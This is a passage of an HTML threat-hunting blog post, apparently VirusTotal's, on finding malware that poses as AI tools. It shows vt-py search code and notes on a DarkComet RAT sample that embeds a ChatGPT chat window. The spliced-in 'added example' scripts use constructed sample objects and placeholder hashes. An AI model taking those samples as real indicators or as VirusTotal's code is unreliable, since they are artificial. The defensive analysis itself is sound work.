src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7UTp6MjCeIklqJBP_IIAXU519SzGv0U3fX29IF5owOGJXLqGsH_N7RCBBDO08OxSZ2v54Of-uKW-9kvSCipn7CfxZ3KHdCbUHIA9AMNF5FpjqRSrpmMUoCrFjY8tqoJ92QauqFn3DV0sHSyf3NS7cHaJPGNjqnMtknPkaYfROw3g83L23oi3FL9GGbyI/s16000/Screenshot%202023-11-29%20at%2009.13.07.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">This can be automated to easily discriminate samples based on different criteria, such as detection rate, using </span><a href="https://github.com/VirusTotal/vt-py" style="font-size: 11pt; text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">VT-PY</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"> or VirusTotal’s API. 
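</span></p>
<p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The discrimination step described here, as an added example that is not the post's own code: a script that takes objects in the shape vt-py's Object.to_dict() returns (a top-level attributes mapping carrying last_analysis_stats) and ranks them by detection rate, keeping only those with at least a chosen number of positives, the same p:5+ criterion used in the searches above. The SAMPLE_OBJECTS and their SAMPLE-* ids are constructed for the example, and the fetch_objects helper is an assumed name; it mirrors the iterator call from the post's snippet and needs vt-py plus an API key, while everything else runs offline.</span></p>

```python
"""Ranking VirusTotal search results by detection rate.

Added example, not the post's code. It assumes the dict layout that
vt-py's Object.to_dict() returns: a top-level "attributes" mapping that
carries "last_analysis_stats" with per-verdict engine counters
(malicious, suspicious, undetected, harmless, timeout, ...).
"""
from typing import Iterable

# Counters that mean an engine really scanned the file. The other keys of
# last_analysis_stats (timeout, failure, type-unsupported, ...) are left out
# so that engines which never produced a verdict do not dilute the ratio.
VERDICT_KEYS = ("malicious", "suspicious", "undetected", "harmless")


def _stats(obj: dict) -> dict:
    """Return the last_analysis_stats mapping of a VT object dict (or {})."""
    return obj.get("attributes", {}).get("last_analysis_stats", {}) or {}


def scanned_count(obj: dict) -> int:
    """Number of engines that returned a verdict for this object."""
    return sum(int(_stats(obj).get(k, 0)) for k in VERDICT_KEYS)


def detection_ratio(obj: dict) -> float:
    """Fraction of verdict-producing engines that flagged the file malicious.

    Returns 0.0 when no engine produced a verdict (for instance a file type
    nobody supports), so such objects fall below any positive threshold
    instead of raising ZeroDivisionError.
    """
    scanned = scanned_count(obj)
    if scanned == 0:
        return 0.0
    return int(_stats(obj).get("malicious", 0)) / scanned


def triage(objects: Iterable[dict], min_positives: int = 5,
           min_ratio: float = 0.0) -> list:
    """Keep objects with >= min_positives malicious verdicts and a detection
    ratio >= min_ratio; return summary rows sorted by ratio, highest first.

    min_positives=5 matches the p:5+ criterion of the searches above.
    """
    rows = []
    for obj in objects:
        positives = int(_stats(obj).get("malicious", 0))
        ratio = detection_ratio(obj)
        if positives >= min_positives and ratio >= min_ratio:
            rows.append({
                "id": obj.get("id"),
                "type": obj.get("type"),
                "positives": positives,
                "scanned": scanned_count(obj),
                "ratio": round(ratio, 3),
            })
    rows.sort(key=lambda r: (r["ratio"], r["positives"]), reverse=True)
    return rows


async def fetch_objects(api_key: str, query: str, limit: int = 0) -> list:
    """Online counterpart (assumed helper; needs vt-py and an API key).

    Mirrors the post's client.iterator() call on /intelligence/search so the
    result can be fed straight into triage(). The query can be any of the
    search strings shown above, e.g.
    'entity:file p:5+ (embedded_domain:api.openai.com or behaviour_network:api.openai.com)'.
    """
    import vt  # deferred so the offline functions work without vt-py installed

    results = []
    async with vt.Client(api_key) as client:
        async for obj in client.iterator("/intelligence/search",
                                         params={"query": query}, limit=limit):
            results.append(obj.to_dict())
    return results


# Constructed sample objects (not real VirusTotal records); ids are placeholders.
SAMPLE_OBJECTS = [
    {"id": "SAMPLE-A", "type": "file", "attributes": {"last_analysis_stats": {
        "malicious": 48, "suspicious": 1, "undetected": 20, "harmless": 0,
        "timeout": 2, "type-unsupported": 5}}},
    {"id": "SAMPLE-B", "type": "file", "attributes": {"last_analysis_stats": {
        "malicious": 3, "suspicious": 0, "undetected": 65, "harmless": 0,
        "timeout": 0, "type-unsupported": 4}}},
    {"id": "SAMPLE-C", "type": "file", "attributes": {"last_analysis_stats": {
        "malicious": 13, "suspicious": 2, "undetected": 49, "harmless": 0,
        "timeout": 1, "type-unsupported": 6}}},
    # Nothing scanned this one: every engine reported type-unsupported.
    {"id": "SAMPLE-D", "type": "file", "attributes": {"last_analysis_stats": {
        "type-unsupported": 70}}},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_OBJECTS, min_positives=5):
        print(row)
```

<p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The ratio is computed over engines that actually returned a verdict rather than over the full counter set, so a file that many engines cannot parse is not artificially pushed below the threshold; a file no engine scanned gets a ratio of 0.0 and simply drops out of the ranking.</span></p>
<p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">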
Let’s see an example.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The following code uses the API to get a list of entities communicating with </span><a href="http://api.openai.com" style="font-size: 11pt; text-decoration-line: none;"><span style="color: #1155cc; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">api.openai.com</span></a><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">, including referring files:</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">import vt  # vt-py client library (the snippet assumes it is already imported)<br />cli = vt.Client(API_KEY)  # API_KEY is an assumed name for your VirusTotal API key<br /># the 'async for' below must run inside an async function or a notebook with top-level await<br />malware_AI_objects = []<br /></span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">async</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 
</span><span style="background-color: transparent; color: #af00db; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">for</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> mai </span><span style="background-color: transparent; color: blue; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">in</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> cli.iterator(<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: #a31515; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'/intelligence/search'</span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">,<br /></span><span style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> params={<br /></span><span 
style="background-color: transparent; color: #1f1f1f; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">        'query': 'https://api.openai.com',
        'attributes': (''),
        'relationships': ('referrer_files')},
    limit=0):
    malware_AI_objects.append(mai.to_dict())</span></i></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt;">We can iterate over the results of the previous query to obtain the list of all related files. The 'malware_AI_objects' list now holds the matching URL objects together with their 'referrer_files' relationship, which is what we use to get additional details on those files:</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwDEMxoEl9uFU8V50mSoqTv87kFxNkq-JqzNjl7rhOHSUZjubA-REazP9os3x5hqT8_4f13V5dQVAYf-ZDubX6b_qL6K6YzQ9ysSjgH4q5iIZz7tlZihYbG9qEohRtZdNB5Q0R58rgX0NPZ7gqhWrbXFtiPRHj_qBr76G5s1ipoxgViLWgYf9gybKSP_A/s1776/Screenshot%202023-11-29%20at%2009.13.52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="1776" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwDEMxoEl9uFU8V50mSoqTv87kFxNkq-JqzNjl7rhOHSUZjubA-REazP9os3x5hqT8_4f13V5dQVAYf-ZDubX6b_qL6K6YzQ9ysSjgH4q5iIZz7tlZihYbG9qEohRtZdNB5Q0R58rgX0NPZ7gqhWrbXFtiPRHj_qBr76G5s1ipoxgViLWgYf9gybKSP_A/s16000/Screenshot%202023-11-29%20at%2009.13.52.png" /></a></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt;">The following code keeps the URLs that have at least one referrer file, then walks the referrer files of one of them (a single URL id is shown here), requesting the 'sha256' and 'last_analysis_stats' attributes we need to tell the malicious files apart.</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">malware_AI_df = pd.DataFrame(
    [{'domain': mai['id'], **mai['relationships']}
     for mai in malware_AI_objects
     if mai['relationships']['referrer_files']['data']])

malware_AI_hashes = []
async for mai in cli.iterator('/urls/9b1b5eabf33c765585b7f7095d3cd726d73db49f3559376f426935bbd4a22d4b/referrer_files',
                              params={'attributes': ('sha256,last_analysis_stats')}, limit=0):
    malware_AI_hashes.append(mai.to_dict())</span></i></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 11pt;">Finally, we can filter the results by the number of AV detections reported in the “malicious” field, here keeping only the files with more than one detection.</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><i><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">malware_AI_hashes_DF = pd.DataFrame(
    [{'sha256': mai['id']}
     for mai in malware_AI_hashes
     if mai['attributes']['last_analysis_stats']['malicious'] > 1]
)</span></i></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 
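11pt;">The pipeline above (search results carrying the 'referrer_files' relationship, the per-URL referrer files, the detection threshold) as a stand-alone added example that is not VirusTotal's code: it needs neither pandas nor vt-py to run, its dict shapes follow the to_dict() output collected above, every id, hash and detection count in it is constructed sample data, and the optional live helper at the end assumes the vt-py package is installed.</span></p><div style="background-color: #f7f7f7; line-height: 1.62857; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: "Courier New", monospace; font-size: 10.5pt; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">
```python
# Offline version of the referrer_files triage shown above. Added example, not
# VirusTotal's code: standard library only, no pandas or vt-py needed to run it.
# Dict shapes mirror the to_dict() output the page's loops collect; every id,
# hash and detection count below is constructed sample data, not a real indicator.
from collections import defaultdict

# Constructed stand-ins for file ids (VirusTotal file ids are SHA-256 hashes).
FILE_1, FILE_2, FILE_3, FILE_4 = "11" * 32, "22" * 32, "33" * 32, "44" * 32

# Constructed: what the intelligence-search loop appends to malware_AI_objects
# when it asks for no attributes and only the 'referrer_files' relationship.
SAMPLE_URL_OBJECTS = [
    {"id": "url-A", "type": "url", "attributes": {}, "relationships": {
        "referrer_files": {"data": [{"type": "file", "id": FILE_1},
                                    {"type": "file", "id": FILE_2}]}}},
    {"id": "url-B", "type": "url", "attributes": {}, "relationships": {
        "referrer_files": {"data": []}}},          # no file refers to this URL
    {"id": "url-C", "type": "url", "attributes": {}, "relationships": {
        "referrer_files": {"data": [{"type": "file", "id": FILE_2},
                                    {"type": "file", "id": FILE_3},
                                    {"type": "file", "id": FILE_4}]}}},
]

def _file(sha256, **stats):
    """Constructed /urls/{id}/referrer_files object carrying only the 'sha256'
    and 'last_analysis_stats' attributes, the two the page requests."""
    attrs = {"sha256": sha256}
    if stats:
        attrs["last_analysis_stats"] = stats
    return {"id": sha256, "type": "file", "attributes": attrs}

# Constructed per-URL results. FILE_2 is referred to by two URLs (must be
# de-duplicated), FILE_3 sits exactly on the page's '> 1' boundary and FILE_4
# has no stats at all, which the page's bare [...] lookup would raise on.
SAMPLE_REFERRER_FILES = {
    "url-A": [_file(FILE_1, malicious=42, suspicious=0, undetected=28, harmless=0),
              _file(FILE_2, malicious=7, suspicious=1, undetected=60, harmless=2)],
    "url-C": [_file(FILE_2, malicious=7, suspicious=1, undetected=60, harmless=2),
              _file(FILE_3, malicious=1, suspicious=0, undetected=65, harmless=4),
              _file(FILE_4)],
}

VERDICT_KEYS = ("malicious", "suspicious", "undetected", "harmless")  # engine answers

def urls_with_referrers(url_objects):
    """Same selection as the page's malware_AI_df: keep only URLs that at least
    one file refers to, mapped to the referring file ids."""
    return {u["id"]: [f["id"] for f in u["relationships"]["referrer_files"]["data"]]
            for u in url_objects if u["relationships"]["referrer_files"]["data"]}

def select_malicious(files_by_url, min_malicious=2):
    """Same filter as the page's malware_AI_hashes_DF (malicious > 1 is
    min_malicious=2), plus: de-duplicate a file seen under several URLs, record
    which URLs refer to it, and set aside objects without stats instead of
    raising KeyError. Returns (rows sorted by detections desc, skipped hashes)."""
    stats_by_hash = {}             # sha256 -> last_analysis_stats (first seen)
    referrers = defaultdict(set)   # sha256 -> URL ids that refer to it
    skipped = set()
    for url_id, objects in files_by_url.items():
        for obj in objects:
            attrs = obj.get("attributes", {})
            sha256 = attrs.get("sha256", obj["id"])
            stats = attrs.get("last_analysis_stats")
            if not stats:
                skipped.add(sha256)
                continue
            stats_by_hash.setdefault(sha256, stats)
            referrers[sha256].add(url_id)
    rows = []
    for sha256, stats in stats_by_hash.items():
        malicious = stats.get("malicious", 0)
        if malicious >= min_malicious:
            rows.append({"sha256": sha256, "malicious": malicious,
                         "engines": sum(stats.get(k, 0) for k in VERDICT_KEYS),
                         "referrer_urls": sorted(referrers[sha256])})
    rows.sort(key=lambda r: (-r["malicious"], r["sha256"]))
    return rows, sorted(skipped)

async def fetch_referrer_files(api_key, url_id):
    """Live counterpart of the page's loop, using the same cli.iterator() call.
    Assumes the vt-py package is installed; imported lazily so the offline demo
    runs without it."""
    import vt
    async with vt.Client(api_key) as cli:
        return [obj.to_dict() async for obj in cli.iterator(
            f"/urls/{url_id}/referrer_files",
            params={"attributes": "sha256,last_analysis_stats"}, limit=0)]

def main():
    print("URLs with referrer files:", sorted(urls_with_referrers(SAMPLE_URL_OBJECTS)))
    rows, skipped = select_malicious(SAMPLE_REFERRER_FILES, min_malicious=2)
    for r in rows:
        print(f"{r['sha256'][:16]}...  {r['malicious']:>3}/{r['engines']} malicious,"
              f" referred to by {', '.join(r['referrer_urls'])}")
    if skipped:
        print("no last_analysis_stats yet, re-check later:", skipped)

if __name__ == "__main__":
    main()
```
</span></div><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-size: 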
11pt;">We can easily modify this script to obtain the files ('Communicating Files') that interact with the 'api.openai.com' domain.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span><br /></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span id="docs-internal-guid-5a8f444f-7fff-8a36-2f02-06bd9b0bb20c"></span></p><h4 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">RAT in the chat</span></h4><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">As previously mentioned, we found several RAT samples mimicking AI applications (Google Bard, OpenAI Chat-GPT). 
Some DarkComet samples use 'https://api.openai.com/v1/completions', which according to </span><a href="https://platform.openai.com/docs/api-reference/completions/object" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">OpenAI’s documentation</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, can be used to prompt Chat-GPT. This endpoint requires an API key.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><a href="https://www.virustotal.com/gui/file/3029654bf524854b2be6403e881b764552ac2578360c2d00f960e98dc5aae52d/detection" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">One of these samples</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">, with 42 AV detections, included this URL although it did not connect to openai.com during sandbox execution, so we took a deeper look.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; 
margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">The first disassembled instructions show the 'krnln.fnr' string and the registry entry "Software\FlySky\E\Install", both of which point to </span><a href="https://en.wikipedia.org/wiki/Easy_Programming_Language#:~:text=Easy%20Programming%20Language%20(EPL%2C%20Chinese,features%20a%20full%20Chinese%20environment." style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">EPL</span></a><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (Easy Programming Language). </span><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">EPL provides functionality similar to Visual Basic. 
This </span><a href="https://www.hexacorn.com/blog/2019/02/13/pe-files-and-the-easy-programming-language-epl/" style="text-decoration: none;"><span style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">blog post</span></a><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> (@Hexacorn) provides more information on how to analyze these files.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy5c1HZ-GuaiEBnSXHstn5EgOH9a5VNGtuSHS3PAToF5F0EEaKU2yy056rS7hQevys4czLPKjMfub8zh2Zsxv9nr2ZQG1SGBe0vwjldAkrjtmXd3uFBu2smKiXhLp6U2Z_qgQkNWiICf2xIgI_bneNjnUcuW7yEDl-2h32pXY03Kd6iCVarI30B3OxboQ/s1496/Screenshot%202023-11-29%20at%2009.14.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1120" data-original-width="1496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy5c1HZ-GuaiEBnSXHstn5EgOH9a5VNGtuSHS3PAToF5F0EEaKU2yy056rS7hQevys4czLPKjMfub8zh2Zsxv9nr2ZQG1SGBe0vwjldAkrjtmXd3uFBu2smKiXhLp6U2Z_qgQkNWiICf2xIgI_bneNjnUcuW7yEDl-2h32pXY03Kd6iCVarI30B3OxboQ/s16000/Screenshot%202023-11-29%20at%2009.14.39.png" /></a></div><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span id="docs-internal-guid-ba1d18bb-7fff-4b63-f09e-6c82e3e2bb48"></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 
0pt; text-align: left;"><span style="background-color: transparent; color: black; font-family: Arial,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">If this framework is installed on the victim's computer, the sample opens a window where the victim can interact with Chat-GPT, starting with a 'How are you?' in Chinese.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmRKdvlN1e7CJq-TM_IFTU1bB3San1pXgTHsSK1_efqB5Vq7RbXnqxXD66Z1ryzm6DK63msWqgh4BcJOyhe32uTJzyXwaLhgnCrVwzBbVm6bZMd8IYU9CNeTXx1xhDCzhRB2GXL-L_kP_u2hE8TStx5opA_DS5GEAvua4xIR1cdllTSGoSt-w3nnMS9NI/s1878/Screenshot%202023-11-29%20at%2009.15.14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1878" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmRKdvlN1e7CJq-TM_IFTU1bB3San1pXgTHsSK1_efqB5Vq7RbXnqxXD66Z1ryzm6DK63msWqgh4BcJOyhe32uTJzyXwaLhgnCrVwzBbVm6bZMd8IYU9CNeTXx1xhDCzhRB2GXL-L_kP_u2hE8TStx5opA_DS5GEAvua4xIR1cdllTSGoSt-w3nnMS9NI/s16000/Screenshot%202023-11-29%20at%2009.15.14.png" /></a></div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;"><br /></span></p>This file appears in the resource segment of another PE file. 
This parent file is a RAT that </span><span style="color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">executes the previous chatbot.</span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRfh4sFZ1uwaL94qOXHx0xD0H2SkY6R6fQWIdAUKrxDer2rOCQcKY-lPrS3iqr5WvELhfTb_p8KCERZnyWz-DY3FLpr6BgdgYb4RHBE76UZzsDpQHnFNZw7unk0MbGihmfIghtsuFnw1yLFDzg_-LVaAJm3RmQk3dB64A0M7onqPuy6a3O8yb3z4PfBE/s1876/Screenshot%202023-11-29%20at%2009.23.32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="230" data-original-width="1876" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRfh4sFZ1uwaL94qOXHx0xD0H2SkY6R6fQWIdAUKrxDer2rOCQcKY-lPrS3iqr5WvELhfTb_p8KCERZnyWz-DY3FLpr6BgdgYb4RHBE76UZzsDpQHnFNZw7unk0MbGihmfIghtsuFnw1yLFDzg_-LVaAJm3RmQk3dB64A0M7onqPuy6a3O8yb3z4PfBE/s16000/Screenshot%202023-11-29%20at%2009.23.32.png" /></a></div><br /><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><p style="text-align: left;"></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: transparent; color: #1f1f1f; font-family: 'Google Sans',sans-serif; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span 
id="docs-internal-guid-5b5ea83b-7fff-9150-0073-a0ed6c5080aa"></span></span></p><h4 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Wrapping it up</span></h4><div style="text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span></div><div style="text-align: left;"><span style="background-color: transparent; color: #434343; font-family: Arial,sans-serif; font-size: 13.999999999999998pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 18pt; padding: 0pt 0pt 18pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-family: "Google Sans", sans-serif; font-size: 12pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline;">The integration of AI engines into VirusTotal has provided a unique opportunity to evaluate their capabilities in real-world scenarios. 
